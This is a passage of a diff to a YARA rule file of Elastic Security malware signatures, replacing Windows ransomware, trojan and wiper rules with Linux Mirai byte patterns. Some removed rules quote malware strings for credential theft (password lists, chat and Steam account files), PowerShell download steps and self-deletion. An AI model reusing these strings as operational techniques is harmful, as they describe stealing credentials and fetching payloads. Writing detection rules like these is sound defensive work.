"e3a1d92df6fb566e09c389cfb085126d2ea0f51a776ec099afb8913ef5e96f9b" + logic_hash = "43b0ac7090620eb6c892f1105778c395bf18f5ac309ce1b2d9015b5abccbfc2a" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "d8016c9be4a8e5b5ac32b7108542fee8426d65b4d37e2a9c5ad57284abb3781e" - threat_name = "Windows.Ransomware.Phobos" - severity = 90 + tags = "FILE, MEMORY" + fingerprint = "fdbeaae0a96f3950d19aed497fae3e7a5517db141f53a1a6315b38b1d53d678b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $c1 = { 24 18 83 C4 0C 8B 4F 0C 03 C6 50 8D 54 24 18 52 51 6A 00 6A 00 89 44 } + $a = { 01 00 00 C1 00 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D } condition: - 1 of ($c*) + all of them } -rule ELASTIC_Windows_Ransomware_Phobos_11Ea7Be5 : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_D8779A57 : FILE MEMORY { meta: - description = "Identifies Phobos ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "11ea7be5-7aac-41d7-8d09-45131a9c656e" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Phobos.yar#L45-L64" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1f86695f316200c92d0d02f5f3ba9f68854978f98db5d4291a81c06c9f0b8d28" + id = "d8779a57-c6ee-4627-9eb0-ab9305bd2454" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L577-L595" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c490586fbf90d360cf3b2f9e2dc943809441df3dfd64dadad27fc9f5ee96ec74" + logic_hash = "2154786bbb6dbcc280aaa9e2b75106b585d04c7c85f6162f441c81dc54663cb3" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697" - threat_name = "Windows.Ransomware.Phobos" + tags = "FILE, MEMORY" + fingerprint = "6c7a18cc03cacef5186d4c1f6ce05203cf8914c09798e345b41ce0dcee1ca9a6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $b1 = { C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89 } + $a = { B6 FF 41 89 D0 85 FF 74 29 38 56 08 74 28 48 83 C6 10 31 D2 } condition: - 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Bumblebee_35F50Bea : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3E72E107 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bumblebee (Windows.Trojan.Bumblebee)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "35f50bea-c497-4cc6-b915-8ad3aca7bee6" - date = "2022-04-28" - modified = "2022-06-09" + id = "3e72e107-3647-4afd-a556-3c49dae7eb0c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bumblebee.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9fff05a5aa9cbbf7d37bc302d8411cbd63fb3a28dc6f5163798ae899b9edcda6" - logic_hash = "9f22b1b7f9e2d7858738d02730ef5477f8d430ad3606ebf4ac8b01314fdc9c46" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L597-L615" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "57d04035b68950246dd152054e949008dafb810f3705710d09911876cd44aec7" + logic_hash = "ba0ba56ded8977502ad9f8a1ceebd30efbff964d576bbfeedff5761f0538d8f0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f2e07a9b7d143ca13852f723e7d0bd55365d6f8b5d9315b7e24b7f1101010820" + fingerprint = "3bca41fd44e5e9d8cdfb806fbfcaab3cc18baa268985b95e2f6d06ecdb58741a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 43 28 45 33 D2 4D 8D 0C 00 44 88 54 24 20 66 48 0F 7E C9 66 0F } - $a2 = { 31 DA 48 31 C7 45 ?? C9 B9 E8 03 C7 45 ?? 00 00 BA 01 C7 45 ?? 00 00 00 48 C7 45 ?? B8 88 77 66 C7 45 ?? 55 44 33 22 C7 45 ?? 11 FF D0 EB C6 45 } + $a = { 10 85 C0 BA FF FF FF FF 74 14 8D 65 F4 5B 5E 5F 89 D0 5D C3 8D } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Bumblebee_70Bed4F3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_5C62E6B2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bumblebee (Windows.Trojan.Bumblebee)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "70bed4f3-f515-4186-ac6c-e9db72b8a95a" - date = "2022-04-28" - modified = "2022-06-09" + id = "5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bumblebee.yar#L22-L46" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9fff05a5aa9cbbf7d37bc302d8411cbd63fb3a28dc6f5163798ae899b9edcda6" - logic_hash = "3ff97986bfd8df812c4ef94395b3ac7f9ead4d059c398f8984ee217a1bcee4af" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L617-L635" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" + logic_hash = "6505c4272f0f7c8c5f2d3f7cefdc3947c4015b0dfd94efde4357a506af93a99d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "016477598ce022cc75f591d1c72535a3353ecc4e888642e72aa29476464a8c2f" + fingerprint = "39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Checking Virtual PC processes %s " wide fullword - $a2 = "SELECT * FROM Win32_ComputerSystemProduct" ascii fullword - $a3 = "Injection-Date" ascii fullword - $a4 = " -Command \"Wait-Process -Id " ascii fullword - $a5 = "%WINDIR%\\System32\\wscript.exe" wide fullword - $a6 = "objShell.Run \"rundll32.exe my_application_path" - $a7 = "Checking reg key HARDWARE\\Description\\System - %s is set to %s" wide fullword + $a = { FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Wiper_Doublezero_65Ec0C50 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_C5430Ff9 : FILE MEMORY { meta: - description = "Detects Windows Wiper Doublezero (Windows.Wiper.DoubleZero)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "65ec0c50-4038-46a7-879b-fbb4aab18725" - date = "2022-03-22" - modified = "2022-04-12" + id = "c5430ff9-af40-4653-94c3-4651a5e9331e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Wiper_DoubleZero.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe" - logic_hash = "bce33817d99f71b9d087ea079ef8db08b496315b72cf9d1cf6f0b107a604e52c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L637-L655" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5676773882a84d0efc220dd7595c4594bc824cbe3eeddfadc00ac3c8e899aa77" + logic_hash = "8c385980560cd4b24e703744b57a9d5ea1bca8fbeea066e98dd4b40009e56104" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2441bcdf7bc48df098f4ef68231fb15fc5c8f96af2e170de77f1718487b945b2" + fingerprint = "a19dcb00fc5553d41978184cc53ef93c36eb9541ea19c6c50496b4e346aaf240" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = "\\Users\\\\.*?\\\\AppData\\\\Roaming\\\\Microsoft.*" wide fullword - $s2 = "\\Users\\\\.*?\\\\AppData\\\\Local\\\\Application Data.*" wide fullword - $s3 = "\\Users\\\\.*?\\\\Local Settings.*" wide fullword - $s4 = "get__beba00adeeb086e6" ascii fullword - $s5 = "FileShareWrite" ascii fullword + $a = { 00 00 00 FC F3 A6 0F 97 C2 0F 92 C0 38 C2 75 29 83 EC 08 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Azorult_38Fce9Ea : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_402Adc45 : FILE MEMORY { meta: - description = "Detects Windows Trojan Azorult (Windows.Trojan.Azorult)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "38fce9ea-a94e-49d3-8eef-96fe06ad27f8" - date = "2021-08-05" - modified = "2021-10-04" + id = "402adc45-6279-44a6-b766-24706b0328fe" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Azorult.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491" - logic_hash = "e23b21992b7ff577d4521c733929638522f4bf57b54c72e5e46196d028d6be26" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L657-L675" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ae0cd7e5bac967e31771873b4b41a1887abddfcdfcc76fa9149bb2054b03ca4" + logic_hash = "dab879d57507d5e119ddf4ce6ed33570c74f185a2260e97a7ec1d6c844943e5d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a" + fingerprint = "01b88411c40abc65c24d7a335027888c0cf48ad190dd3fa1b8e17d086a9b80a0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "/c %WINDIR%\\system32\\timeout.exe 3 & del \"" wide fullword - $a2 = "%APPDATA%\\.purple\\accounts.xml" wide fullword - $a3 = "%TEMP%\\curbuf.dat" wide fullword - $a4 = "PasswordsList.txt" ascii fullword - $a5 = "Software\\Valve\\Steam" wide fullword + $a = { C3 EB DF 5A 5B 5D 41 5C 41 5D C3 41 57 41 56 41 55 41 54 55 53 48 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Exploitscan_4327F817 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_A39Dfaa7 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Exploitscan (Linux.Hacktool.Exploitscan)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "4327f817-cb11-480f-aba7-4d5170c77758" + id = "a39dfaa7-7d2c-4d40-bea5-bbebad522fa4" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Exploitscan.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "66c6d0e58916d863a1a973b4f5cb7d691fbd01d26b408dbc8c74f0f1e4088dfb" - logic_hash = "7797d9bd75dff355e1ee84b856e77cf9e886dfe727fb8ce7a6fdbe5ed1eb0985" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L677-L694" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "98fde36fc412b6aa50c80c12118975a6bf754a9fba94f1cc3cdeed22565d6b0d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3f70c8ef8f20f763dcada4353c254fe1df238829ce590fb87c279d8a892cf9c4" + fingerprint = "95d12cb127c088d55fb0090a1cb0af8e0a02944ff56fd18bcb0834b148c17ad7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102611,28 +103026,28 @@ rule ELASTIC_Linux_Hacktool_Exploitscan_4327F817 : FILE MEMORY os = "linux" strings: - $a = { 24 08 8B 4C 24 0C 85 C0 74 20 8B 58 20 84 03 83 C3 10 8B 68 24 89 9C 24 DC 00 } + $a = { 00 6C 72 00 00 50 E8 4E 0C 00 00 EB 0E 5A 58 59 97 60 8A 54 } condition: all of them } -rule ELASTIC_Linux_Virus_Thebe_1Eb5985A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_E3E6D768 : FILE MEMORY { meta: - description = "Detects Linux Virus Thebe (Linux.Virus.Thebe)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "1eb5985a-2b35-434f-81d9-f502dff25397" - date = "2021-04-06" + id = "e3e6d768-6510-4eb2-a5ec-8cb8eead13f2" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Virus_Thebe.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "30af289be070f4e0f8761f04fb44193a037ec1aab9cc029343a1a1f2a8d67670" - logic_hash = "7d4bc4b1615048dec1f1fac599afa667e06ccb369bb1242b25887e0ce2a5066a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L696-L714" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b505cb26d3ead5a0ef82d2c87a9b352cc0268ef0571f5e28defca7131065545e" + logic_hash = "b848c7200f405d77553d661a6c49fb958df225875957ead35b35091995f307d1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5cf9aa9a31c36028025d5038c98d56aef32c9e8952aa5cd4152fbd811231769e" + fingerprint = "ce11f9c038c31440bcdf7f9d194d1a82be5d283b875cc6170a140c398747ff8c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102640,156 +103055,141 @@ rule ELASTIC_Linux_Virus_Thebe_1Eb5985A : FILE MEMORY os = "linux" strings: - $a = { 42 31 C9 31 DB 31 F6 B0 1A CD 80 85 C0 0F 85 83 } + $a = { 7E 14 48 89 DF 48 63 C8 4C 89 E6 FC F3 A4 41 01 C5 48 89 FB } condition: all of them } -rule ELASTIC_Windows_Trojan_Sysjoker_1Ef19A12 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_520Deeb8 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sysjoker (Windows.Trojan.SysJoker)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "1ef19a12-ee26-47da-8d65-272f6749b476" - date = "2022-02-17" - modified = "2022-04-12" + id = "520deeb8-cbc0-4225-8d23-adba5e040471" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SysJoker.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "61df74731fbe1eafb2eb987f20e5226962eeceef010164e41ea6c4494a4010fc" - logic_hash = "25bd58d546549d208f9f95f4c27d1e58f86f87750dae1e293544cc92b25f8b32" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L716-L733" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "671c17835f30cce1e5d68dbf3a73d340069b1b55a2ac42fc132c008cb2da622e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9123af8b8b27ebfb9199e70eb34d43378b1796319186d5d848d650a8be02d5d5" + fingerprint = "f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "';Write-Output \"Time taken : $((Get - Date).Subtract($start_time).Seconds) second(s)\"" ascii fullword - $a2 = "powershell.exe Expand-Archive -LiteralPath '" ascii fullword - $a3 = "powershell.exe Invoke-WebRequest -Uri '" ascii fullword - $a4 = "\\recoveryWindows.zip" ascii fullword + $a = { ED 48 89 44 24 30 44 89 6C 24 10 7E 47 48 89 C1 44 89 E8 44 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Sysjoker_34559Bcd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_77137320 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sysjoker (Windows.Trojan.SysJoker)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "34559bcd-661a-4213-b896-2d7f882a16ef" - date = "2022-02-21" - modified = "2022-04-12" + id = "77137320-6c7e-4bb8-81a4-bd422049c309" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SysJoker.yar#L24-L48" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c" - logic_hash = "ebe7f6037f14e37b6efe81614c06c6d26fe0cc17d0475b8b19715f80d0d9aad3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L735-L753" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" + logic_hash = "ee48e0478845a61dbbdb5cc3ee5194eb272fcf6dcf139381f068c9af1557d0d4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b1e01d0b94a60f6f5632a14d3d32f78bbe3049886ea3a3e838a29fb790a45918" + fingerprint = "afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "\\txc1.txt\" && type \"" ascii fullword - $a2 = "tempo1.txt" nocase - $a3 = "user_token=" - $a4 = "{\"status\":\"success\",\"result\":\"" ascii fullword - $a5 = "\",\"av\":\"" ascii fullword - $a6 = "aSwpEHc0QyIxPRAqNmkeEwskMW8HODkkYRkCICIrJysHNmtlIzQiChMiGAxzQg==" ascii fullword - $a7 = "ESQuBT8uQyglJy4QOicGXDMiayYtPQ==" ascii fullword + $a = { 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Vulndriver_Vbox_3315863F : FILE +rule ELASTIC_Linux_Trojan_Mirai_A6A81F9C : FILE MEMORY { meta: - description = "Subject: innotek GmbH" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "3315863f-668c-47ec-86c7-85d50c3b97d9" - date = "2022-04-07" - modified = "2022-04-07" + id = "a6a81f9c-b43b-4ec3-8b0b-94c1cfee4f08" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_VBox.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498" - logic_hash = "ba4e6a94516e36dcd6140b6732d959703e2c58a79add705b9260001ea26db738" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L755-L772" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0d31cc1f4a673c13e6c81c492acbe16e1e0dfb0b15913fb276ea4abff18b32af" score = 75 quality = 75 - tags = "FILE" - fingerprint = "b0aea1369943318246f1601f823c72f92a0155791661dadc4c854827c295e4bf" - threat_name = "Windows.VulnDriver.VBox" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "e1ec5725b75e4bb3eefe34a17ced900a16af9329a07a99f18f88aaef2678bfc1" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $subject_name = { 06 03 55 04 03 [2] 69 6E 6E 6F 74 65 6B 20 47 6D 62 48 } + $a = { 41 57 00 54 43 50 00 47 52 45 00 4B 54 00 73 68 65 6C 6C 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name + all of them } -rule ELASTIC_Windows_Vulndriver_Vbox_1B1C5Cd5 : FILE +rule ELASTIC_Linux_Trojan_Mirai_485C4B13 : FILE MEMORY { meta: - description = "Name: VBoxDrv.sys, Version: 3.0.0.0" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "1b1c5cd5-23d3-4f1f-a396-3f2b18e28b64" - date = "2022-04-07" - modified = "2022-04-07" + id = "485c4b13-3c7c-47a7-b926-8237cb759ad7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_VBox.yar#L22-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22" - logic_hash = "5fcfffea021aee8d18172383df0e65f8c618fab545c800f1a7b659e8112c6c0f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L774-L792" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" + logic_hash = "9625e4190559cc77f41ebef24f9bfa5e3d2e2259c12b301148c614b0f98b5835" score = 75 quality = 75 - tags = "FILE" - fingerprint = "89dd35bb023ebc03c46c0e70ac975025921da289cb3374f2912fbb323c591bd9" - threat_name = "Windows.VulnDriver.VBox" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "28f3e8982cee2836a59721c88ee0a9159ad6fdfc27c0091927f5286f3a731e9a" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 56 00 42 00 6F 00 78 00 44 00 72 00 76 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a = { 7E 1F 8B 4C 24 4C 01 D1 0F B6 11 88 D0 2C 61 3C 19 77 05 80 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Hacktool_Bruteforce_Bad95Bd6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_7146E518 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Bruteforce (Linux.Hacktool.Bruteforce)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "bad95bd6-94a9-4abf-9d3b-781f0b79c5ce" + id = "7146e518-f6f4-425d-bac8-b31edc0ac559" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Bruteforce.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8e8be482357ebddc6ac3ea9ee60241d011063f7e558a59e6bd119e72e4862024" - logic_hash = "8001e6503baeb52c66c9b30026544913270085406a1fe4c45d14629811d36d5f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L794-L811" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "374602254be1f5c1dbb00ad25d870722e03d674033dfcf953a2895e1f50c637d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "10698122ff9fe06b398307ec15ad4f5bb519285e1eaad97011abf0914f1e7afd" + fingerprint = "334ef623a8dadd33594e86caca1c95db060361c65bf366bacb9bc3d93ba90c4f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102797,28 +103197,27 @@ rule ELASTIC_Linux_Hacktool_Bruteforce_Bad95Bd6 : FILE MEMORY os = "linux" strings: - $a = { 73 65 6E 64 6D 6D 73 67 00 66 70 75 74 73 00 6D 65 6D 63 70 79 00 } + $a = { 85 82 11 79 AF 20 C2 7A 9E 18 6C A9 00 21 E2 6A C6 D5 59 B4 E8 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Bruteforce_66A14C03 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_6A77Af0F : FILE MEMORY { meta: - description = "Detects Linux Hacktool Bruteforce (Linux.Hacktool.Bruteforce)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = 